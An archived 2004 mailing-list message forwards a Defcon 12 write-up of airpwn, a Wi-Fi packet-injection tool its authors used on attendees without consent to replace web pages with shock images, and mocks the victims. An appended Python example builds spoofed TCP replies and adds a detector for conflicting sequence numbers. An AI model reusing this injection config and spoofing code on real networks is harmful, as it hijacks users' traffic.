Re: OT (sortof) security related for all u wifi people

From: Mac Mason <mac@cs.hmc.edu>
Date: Sat Aug 07 2004 - 12:26:30 AKDT

Yeah, I spent a few minutes trying to figure out why my gentoo forums
had an image reading '0wned!' all over them.

Ahh, I love Defcon.

    --Mac

On Fri, Aug 06, 2004 at 11:36:08PM -0800, Shortpier wrote:
> If I was not a nice person............
> Look out coffee shops..............
> http://www.evilscheme.org/defcon/
>
>
> -- HTML Attachment decoded to text by Ecartis --
> -- File: www.evilscheme.org/defcon/
>
> Goatse at Defcon -- brought to you by airpwn
>
> airpwn - bringing goatse (and friends) to Defcon 12!
>
> Images from Dave's camera[1]
> Movies from Dave's camera[2]
> Images from my phone[3]
>
>
> At Defcon 12 this year my cow-orkers and I brought along a little piece of
> code called "airpwn." Airpwn is a platform for injection of application
> layer data on an 802.11b network. Although the potential for evil is very
> high with this tool, we decided to demonstrate it (and give it its first real
> field trial) on something nasty, but harmless (compared to say, wiping your
> hard-drive).
>
> Over the course of defcon, we fielded 7 different airpwn configurations to
> see how well it worked, and of course to watch as 31337 h4x0rz got goatse up
> in their mug. The configurations were:
> * HTTP goatse, 100% of the screen
> * HTTP goatse replacing all images
> * HTTP goatse as the page background via CSS
> * HTTP tubgirl replacing all images
> * HTTP "owned" graphic, replacing all images (eventually I felt bad
> about all the ass pictures)
> * HTTP javascript alert boxes, letting people know just how pwned they
> were
> * FTP banners (while this worked, nobody pays attention to FTP banners
> so we abandoned this quickly)
>
>
> How does it work?
>
> airpwn requires two 802.11b interfaces, one for listening, and another for
> injecting. It uses a config file with multiple config sections to respond to
> specific data packets with arbitrary content. For example, in the HTML
> goatse example, we look for any TCP data packets starting with "GET" or
> "POST" and respond with a valid server response including a reference to the
> canonical goatse image. Here's the configuration file used for this mode:
>
>   begin goatse_html
>   match ^(GET|POST)
>   ignore ^GET [^ ?]+\.(jpg|jpeg|gif|png|tif|tiff)
>   response content/goatse_html
>
> and here is the content that we return when the match is triggered:
>
>   HTTP/1.1 200 OK
>   Connection: close
>   Content-Type: text/html
>
>   <html><head><title>pwned</title></head><body><h1>OPEN YOUR MIND -- TO THE
>   ANUS!!</h1><img src='http://goat.cx/hello.jpg' width='100%' height='100%'>
>
> Each of the 7 modes mentioned previously varied in the configuration and
> content returned. In each case the poor user of the web browser was left
> feeling disgusted, afraid and/or confused. While I was busy operating airpwn
> at the laptop, my accomplices wandered the show-floor taking pictures and
> the occasional video of our victims. Links to our victims are at the top of
> the page.
>
> In all honesty, the reaction to airpwn wasn't exactly what I had expected.
> When I was writing the code, I imagined that the second I turned airpwn on
> we'd hear immediate groans of disgust radiating out at the speed of light.
> In practice, airpwn's effect was simultaneously more private, and more full
> of personal drama. First off, the full-screen goatse seemed to be too
> powerful. The second it flashed on the screen, the savvy user would have the
> browser closed already. This made it incredibly difficult to actually catch
> the victims on film. Based on the logs generated by airpwn we would be
> hitting multiple people per second, but finding someone with goatse up on
> their screen was still a bit of a challenge. Once we did find a victim,
> the results were pretty hilarious. I had tears rolling down my cheeks on
> multiple occasions. The typical goatse reaction went something like this:
> * Open browser, see goatse, jump backwards a little
> * quickly close browser, take a breath
> * open browser, see goatse, close browser (faster this time)
> * scratch head, quit browser process, re-launch browser
> * see page indicating that goatse will load soon (page header, etc.)
> immediately close browser.
> * open up browser preferences, click all the tabs, look for the "no
> goatse" checkbox
> * clear the browser cache
> * open browser, see goatse, close browser
> * open network preferences, click on all the tabs, look for the "no
> goatse" checkbox.
> * disconnect from network, re-associate
> * open browser, see goatse, close browser
> At this point, the less l33t people would generally give up and either 1) do
> something else or 2) look deep into goatse's anus with a 10-yard stare[4]..
> The more l33t victims would launch ethereal and try to figure out what was
> going on.. Eventually they would mumble something about "rogue APs" (WRONG!)
> or ARP poisoning (WRONG!) or DNS poisoning (WRONG!) and do something else..
>
> After a few hours, it quickly became apparent that the image replacement
> mode was the only mode that would be sustainable for long periods of time. The
> full-screen goatse amounted to a complete DoS of HTTP, which was just plain
> rude. The javascript injection (with dialog boxes talking about the victim
> being pwned) was by far the most disruptive. Most people (quite sanely)
> immediately turned off their laptops or whipped out ethereal in full
> COUNTERHACK mode. The goatse image mode was disruptive enough to be fully
> fucking hilarious, yet still left HTTP enough alone to be usable. I guess
> image-maps were the only things we truly broke with that mode (hint: click
> the anus!)
>
> Overall, airpwn was just about the only reason why defcon was amusing this
> year.. Without airpwn I think I would have been mostly asleep and would have
> just IRCed the entire time.. If you want to play with airpwn yourself, an
> early alpha has been posted to sourceforge[5]..
>
> -toast
>
> --- Links ---
> 1 dave_images
> 2 dave_video
> 3 bryan_phoneimages
> 4 dave_video/What do I do now.AVI
> 5 http://sf.net/projects/airpwn
>
> ---------
> To unsubscribe, send email to <aklug-request@aklug.org>
> with 'unsubscribe' in the message body.
>

-- 
Julian "Mac" Mason                            mac@cs.hmc.edu
Computer Science '06                          (909)-607-3129
Harvey Mudd College
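The "How does it work?" section in the forwarded page describes airpwn as a match-and-respond engine, but leaves the TCP-level trick implicit: the injector answers a sniffed request as if it were the server, using sequence/acknowledgement numbers copied from the client's own segment, and simply has to beat the real server's reply. The Python below is an added example, written for this archive and not airpwn's code; it applies the goatse_html match/ignore pair from the post to a request, builds the spoofed reply, and then runs the check a victim with ethereal could have used instead of guessing at rogue APs or ARP/DNS poisoning: two server segments with the same SEQ but different data. The addresses (TEST-NET ranges), the request, the inlined response body (standing in for the post's content/goatse_html file, without the image reference), the choice to set FIN on the injected reply, and all function names are this example's own assumptions.

```python
"""Added example: the TCP trick behind airpwn-style injection, and the check a
defender can run against a capture. Not airpwn's code. Packet layouts are
hand-built, addresses/HTTP bodies are constructed, and the config is the post's
goatse_html section with the response body inlined (image reference omitted)."""
import re
import struct

FLAG_FIN, FLAG_PSH, FLAG_ACK = 0x01, 0x08, 0x10
CLIENT = bytes([192, 0, 2, 10])      # constructed (TEST-NET-1) victim address
SERVER = bytes([198, 51, 100, 80])   # constructed (TEST-NET-2) web server address
REQUEST = b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"  # constructed

# The post's config section: 'match' selects requests, 'ignore' excludes image
# fetches (those belong to a different mode), 'response' is what gets injected.
GOATSE_HTML = {
    "match": re.compile(rb"^(GET|POST)"),
    "ignore": re.compile(rb"^GET [^ ?]+\.(jpg|jpeg|gif|png|tif|tiff)"),
    "response": (b"HTTP/1.1 200 OK\r\nConnection: close\r\n"
                 b"Content-Type: text/html\r\n\r\n"
                 b"<html><head><title>pwned</title></head>"
                 b"<body><h1>pwned</h1></body></html>"),
}

def wants_injection(payload, cfg):
    """Apply an airpwn-style match/ignore pair to one TCP payload."""
    return bool(cfg["match"].match(payload)) and not cfg["ignore"].match(payload)

def checksum(data):
    """RFC 1071 ones'-complement sum (data zero-padded to even length)."""
    if len(data) % 2:
        data += b"\0"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_segment(src, dst, sport, dport, seq, ack, flags, payload, ttl=64):
    """Serialize a minimal IPv4+TCP packet (no options) with valid checksums."""
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, ack,
                      (5 << 12) | flags, 8192, 0, 0) + payload
    pseudo = src + dst + struct.pack("!BBH", 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0,
                     ttl, 6, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp

def parse_segment(pkt):
    """Addresses, ports, seq/ack, flags and payload of an IPv4+TCP packet."""
    ihl = (pkt[0] & 0x0F) * 4
    tcp = pkt[ihl:]
    sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    return {"src": pkt[12:16], "dst": pkt[16:20], "sport": sport, "dport": dport,
            "seq": seq, "ack": ack, "flags": off_flags & 0x1FF,
            "payload": tcp[(off_flags >> 12) * 4:]}

def checksums_ok(pkt):
    """True if the IPv4 header and TCP checksums both verify (re-sum to zero)."""
    ihl = (pkt[0] & 0x0F) * 4
    tcp = pkt[ihl:]
    pseudo = pkt[12:16] + pkt[16:20] + struct.pack("!BBH", 0, 6, len(tcp))
    return checksum(pkt[:ihl]) == 0 and checksum(pseudo + tcp) == 0

def spoof_response(client_pkt, cfg):
    """The injection step: answer a sniffed request as if we were the server.
    Our SEQ is the client's ACK (next byte it expects from the server); our ACK
    is the client's SEQ plus its payload length. The client's TCP accepts this
    as in-order data, no rogue AP, ARP or DNS games needed; we only have to
    reply before the real server does. FIN is set (this example's choice) so
    the browser renders without waiting for more data."""
    c = parse_segment(client_pkt)
    if not wants_injection(c["payload"], cfg):
        return None
    return build_segment(c["dst"], c["src"], c["dport"], c["sport"],
                         seq=c["ack"], ack=(c["seq"] + len(c["payload"])) & 0xFFFFFFFF,
                         flags=FLAG_PSH | FLAG_ACK | FLAG_FIN, payload=cfg["response"])

def find_injected_responses(segments):
    """Defender-side check over the server->client half of one flow: two data
    segments claiming the same SEQ but carrying different bytes means something
    raced the real server. Returns (seq, first_payload, second_payload) tuples."""
    seen, conflicts = {}, []
    for pkt in segments:
        s = parse_segment(pkt)
        if not s["payload"]:
            continue
        key = (s["src"], s["dst"], s["sport"], s["dport"], s["seq"])
        if key in seen and seen[key] != s["payload"]:
            conflicts.append((s["seq"], seen[key], s["payload"]))
        seen.setdefault(key, s["payload"])
    return conflicts

def demo():
    """Constructed exchange: client GET, the injected reply, then the late real reply."""
    client_pkt = build_segment(CLIENT, SERVER, 40000, 80, 1000, 5000,
                               FLAG_PSH | FLAG_ACK, REQUEST)
    fake = spoof_response(client_pkt, GOATSE_HTML)
    real = build_segment(SERVER, CLIENT, 80, 40000, 5000, 1000 + len(REQUEST),
                         FLAG_PSH | FLAG_ACK,
                         b"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello")
    return client_pkt, fake, real
```

Running demo() and handing [fake, real] to find_injected_responses() reports one conflict at SEQ 5000, which is the footprint such injection leaves in a capture: the real server's answer shows up afterwards with the same sequence number as data the client has already consumed, so the stack discards it. The same segment pair will usually also differ in IP TTL and IP ID from the genuine server's packets, a second signal worth checking in the same capture.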
Received on Sat Aug 7 12:26:07 2004

This archive was generated by hypermail 2.1.8 : Sat Aug 07 2004 - 12:26:09 AKDT